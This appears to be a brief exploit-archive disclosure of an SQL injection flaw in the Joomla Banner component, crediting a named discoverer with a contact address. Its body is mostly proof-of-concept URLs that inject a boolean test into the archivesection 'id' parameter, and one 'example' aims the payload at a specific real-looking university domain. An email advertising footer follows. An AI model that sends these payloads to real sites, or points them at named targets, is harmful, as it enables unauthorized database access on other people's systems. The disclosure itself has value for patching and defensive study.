Joomla Banner Component Index.PHP SQL Injection Vulnerability ---------------------------------------------------------------------------------------- Vulnerable: Joomla Banner Component Discover by: Malibu.r Contact: malibu.r@hotmail.com proof of concept: /home/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1 /home/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1&Itemid=1 example: uni-pr.edu/home/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1 _________________________________________________________________ Find a local pizza place, music store, museum and more…then map the best route! http://local.live.com